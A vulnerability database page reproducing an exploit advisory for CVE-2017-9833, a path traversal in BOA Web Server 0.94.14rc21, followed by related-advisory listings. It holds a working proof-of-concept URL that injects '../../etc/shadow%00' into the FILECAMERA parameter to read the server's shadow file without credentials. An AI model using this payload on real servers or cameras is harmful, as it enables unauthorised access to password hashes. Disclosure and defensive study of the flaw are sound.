Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitpackMiguel Mendez ZEXPLOITPACK:CAA6470AE568126D3A32A4DDA2E51A5D
HistoryJun 20, 2017 - 12:00 a.m.

BOA Web Server 0.94.14rc21 - Arbitrary File Access

2017-06-2000:00:00
Miguel Mendez Z
109

0.735 High

EPSS

Percentile

98.1%

JSON

BOA Web Server 0.94.14rc21 - Arbitrary File Access

BOA Web Server 0.94.14 - Access to arbitrary files as privileges

Title: Vulnerability in BOA Webserver 0.94.14
Date: 20-06-2017
Status: Vendor contacted, patch available
Scope: Arbitrary file access
Platforms: Unix
Author: Miguel Mendez Z
Vendor Homepage: http://www.boa.org
Version: Boa Webserver 0.94.14rc21
CVE: CVE-2017-9833


Vulnerability description
-------------------------
-We can read any file located on the server
The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials

Vulnerable variable:
FILECAMERA=../../etc/shadow%00

Exploit link:
/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0

Poc:
http://127.0.0.1/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0

Related

cve 1
packetstorm 1
prion 1
attackerkb 1
cvelist 1
zdt 1
ubuntucve 1
nuclei 1
openvas 1
nvd 1
exploitdb 1
thn 1
cve
cve
CVE-2017-9833
2017-06-24 02:29:00
packetstorm
packetstorm
BOA Web Server 0.94.14rc21 Arbitrary File Access
2017-07-03 00:00:00
prion
prion
Design/Logic Flaw
2017-06-24 02:29:00
attackerkb
attackerkb
CVE-2017-9833
2017-06-24 00:00:00
cvelist
cvelist
CVE-2017-9833
2017-06-24 00:00:00
zdt
zdt
BOA Web Server 0.94.14rc21 - Arbitrary File Access Vulnerability
2017-07-03 00:00:00
ubuntucve
ubuntucve
CVE-2017-9833
2017-06-24 00:00:00
nuclei
nuclei
BOA Web Server 0.94.14 - Arbitrary File Access
2022-03-06 22:58:38
openvas
openvas
Multiple IP-Cameras Directory Traversal Vulnerability
2017-06-26 00:00:00
nvd
nvd
CVE-2017-9833
2017-06-24 02:29:00
exploitdb
exploitdb
BOA Web Server 0.94.14rc21 - Arbitrary File Access
2017-06-20 00:00:00
thn
thn
Hackers Exploiting Abandoned Boa Web Servers to Target Critical Industries
2022-11-23 09:28:00

0.735 High

EPSS

Percentile

98.1%

JSON
Related for EXPLOITPACK:CAA6470AE568126D3A32A4DDA2E51A5D
cve1packetstorm1prion1attackerkb1cvelist1zdt1ubuntucve1nuclei1openvas1nvd1exploitdb1thn1